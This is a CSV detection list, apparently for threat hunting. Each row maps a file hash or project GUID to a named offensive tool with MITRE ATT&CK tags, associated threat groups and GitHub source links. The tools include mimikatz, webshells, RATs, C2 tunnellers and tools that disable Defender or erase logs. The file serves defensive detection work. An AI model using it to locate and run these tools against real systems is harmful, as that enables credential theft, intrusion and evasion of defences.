"*61f31088bc43825c500d7d6f22dd7d259b56dd181c9a59650975bd5e9e91cb25*",".{0,1000}61f31088bc43825c500d7d6f22dd7d259b56dd181c9a59650975bd5e9e91cb25.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","27804"
"*6205ddc22a991d9dba9457361b6d4fde7e51b4ca388fafa89fe883a8969202c0*",".{0,1000}6205ddc22a991d9dba9457361b6d4fde7e51b4ca388fafa89fe883a8969202c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27809"
"*6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97*",".{0,1000}6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27810"
"*62097f745d283d52458f0b9ed9d792e03a85dd92f73ebbcc39e125a9b0e368bd*",".{0,1000}62097f745d283d52458f0b9ed9d792e03a85dd92f73ebbcc39e125a9b0e368bd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27811"
"*620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba*",".{0,1000}620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27812"
"*620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba*",".{0,1000}620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27813"
"*62123825c06d2e0915bc2f3dbaa36701c5caf2ed20cabb6cae04004765953627*",".{0,1000}62123825c06d2e0915bc2f3dbaa36701c5caf2ed20cabb6cae04004765953627.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27814"
"*6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106*",".{0,1000}6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27815"
"*621b1aa1737a16c3f34b44236e3c16afa0e0fcbef095bb4d11ce21715e8cc83a*",".{0,1000}621b1aa1737a16c3f34b44236e3c16afa0e0fcbef095bb4d11ce21715e8cc83a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27817"
"*621ee90fbd4723db93d31f385fd3ecac944076a161845d433755faff0d3069a8*",".{0,1000}621ee90fbd4723db93d31f385fd3ecac944076a161845d433755faff0d3069a8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27818"
"*622f3304b381b2f3a99567be78a668e21c1c6a405320da78a2af32addbc29d88*",".{0,1000}622f3304b381b2f3a99567be78a668e21c1c6a405320da78a2af32addbc29d88.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#filehash","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","27819"
"*623c26776e69954af0e99704281ead9358f64dcdc915b38a0b2c532593441ea3*",".{0,1000}623c26776e69954af0e99704281ead9358f64dcdc915b38a0b2c532593441ea3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27820"
"*623eff8ac5efc0fd81c37ff8262eba95b7ea2bb941366b7edde5dcf5524292fd*",".{0,1000}623eff8ac5efc0fd81c37ff8262eba95b7ea2bb941366b7edde5dcf5524292fd.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","27821"
"*623F0079-5871-4237-B872-70FDFC2D8C52*",".{0,1000}623F0079\-5871\-4237\-B872\-70FDFC2D8C52.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#GUIDproject","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","27822"
"*624f527a957cb2ef90782b1b92d94aa22f1028b731d95536fa318c3c1f211d5e*",".{0,1000}624f527a957cb2ef90782b1b92d94aa22f1028b731d95536fa318c3c1f211d5e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27825"
"*625ff12afe53772a22004e384bc21481dbfbc0b4e25dce987e814304e586338b*",".{0,1000}625ff12afe53772a22004e384bc21481dbfbc0b4e25dce987e814304e586338b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27827"
"*6261764bd7c2edc8924a08ca5d9849ef004afe9a0fab841c2c3fb8f4f1d1a406*",".{0,1000}6261764bd7c2edc8924a08ca5d9849ef004afe9a0fab841c2c3fb8f4f1d1a406.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27829"
"*627d9d2bd4fcbb2b219ad2dc49a25ebc695700cb0fc2f1eacdd56cb71d44e258*",".{0,1000}627d9d2bd4fcbb2b219ad2dc49a25ebc695700cb0fc2f1eacdd56cb71d44e258.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27836"
"*627eead4a57da2a46e0ea487bfef48d152687cc6c39d1bfd25203a3a0d501de8*",".{0,1000}627eead4a57da2a46e0ea487bfef48d152687cc6c39d1bfd25203a3a0d501de8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27837"
"*628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e*",".{0,1000}628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27838"
"*628E42D5-AE4F-4CDD-8D14-DAB1A3697B62*",".{0,1000}628E42D5\-AE4F\-4CDD\-8D14\-DAB1A3697B62.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","27839"
"*6290c67de059c8c86e7051348a1fd0934c8bdf6b9badb539a878a1801b0431d6*",".{0,1000}6290c67de059c8c86e7051348a1fd0934c8bdf6b9badb539a878a1801b0431d6.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27840"
"*62971b70cd61bff1243ad58121912ea8aa7ee1cfb553b2310cbbd4c32529e151*",".{0,1000}62971b70cd61bff1243ad58121912ea8aa7ee1cfb553b2310cbbd4c32529e151.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","27841"
"*6298ad100c27577260513c1e8045443ee1630de94b2aee6f0339d25e91ad6186*",".{0,1000}6298ad100c27577260513c1e8045443ee1630de94b2aee6f0339d25e91ad6186.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27842"
"*6299009a4d05609f3960b17f3714579cd3fa4e85c2dbab240672301884fd89d5*",".{0,1000}6299009a4d05609f3960b17f3714579cd3fa4e85c2dbab240672301884fd89d5.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","27843"
"*62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3*",".{0,1000}62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27845"
"*62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3*",".{0,1000}62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27846"
"*62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd*",".{0,1000}62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","27847"
"*62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9*",".{0,1000}62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","27848"
"*62b0e8dc11a981b51b71c3225f8720e33bbe39d65030fa99d1a015c1a1f7c891*",".{0,1000}62b0e8dc11a981b51b71c3225f8720e33bbe39d65030fa99d1a015c1a1f7c891.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27849"
"*62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad*",".{0,1000}62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27850"
"*62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad*",".{0,1000}62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27851"
"*62b639364b226613a7dd3b9ee696a5c52ceef41f66d313cca9ae5e6b3f691bc6*",".{0,1000}62b639364b226613a7dd3b9ee696a5c52ceef41f66d313cca9ae5e6b3f691bc6.{0,1000}","offensive_tool_keyword","POC","CVE-2020-3952 POC exploitation","T1190 - T1040 - T1059.001","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/guardicore/vmware_vcenter_cve_2020_3952","1","0","#filehash","N/A","7","3","273","60","2020-04-16T08:38:42Z","2020-04-16T07:40:51Z","27852"
"*62B6EF3C-3180-4730-A2CE-82D27C43A5B2*",".{0,1000}62B6EF3C\-3180\-4730\-A2CE\-82D27C43A5B2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","27853"
"*62b7eff31d339fd04e6d39aba47b5f37b1b6feb27f85c3c71e4d2d600e8142c6*",".{0,1000}62b7eff31d339fd04e6d39aba47b5f37b1b6feb27f85c3c71e4d2d600e8142c6.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","27855"
"*62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318*",".{0,1000}62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27856"
"*62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6*",".{0,1000}62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","27858"
"*62c2a21006b98e0d124c262372b96eb10f15dc140b5cddfd513454795c55c47f*",".{0,1000}62c2a21006b98e0d124c262372b96eb10f15dc140b5cddfd513454795c55c47f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27859"
"*62cca262256335868ec743989fd6afb8d53d51870abe9a0ef12413a82719f29d*",".{0,1000}62cca262256335868ec743989fd6afb8d53d51870abe9a0ef12413a82719f29d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27860"
"*62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872*",".{0,1000}62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27861"
"*62d8159fd6c2b3dc8175e8bfab36369917530bca9ae2bb2e12bf5d18fbdf9896*",".{0,1000}62d8159fd6c2b3dc8175e8bfab36369917530bca9ae2bb2e12bf5d18fbdf9896.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","27863"
"*62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301*",".{0,1000}62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","#filehash","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","27864"
"*62E3CCF4-07F3-496E-B77D-48D5AC0E6260*",".{0,1000}62E3CCF4\-07F3\-496E\-B77D\-48D5AC0E6260.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","27866"
"*62e4454e30b5238083722ab887d43c7e522a9ace13f1e62bf1618b717b80938c*",".{0,1000}62e4454e30b5238083722ab887d43c7e522a9ace13f1e62bf1618b717b80938c.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27867"
"*62e779d3d44b32644b427335bb091880b637ed5dd3c01ec2ecd9c732a5d17539*",".{0,1000}62e779d3d44b32644b427335bb091880b637ed5dd3c01ec2ecd9c732a5d17539.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","27869"
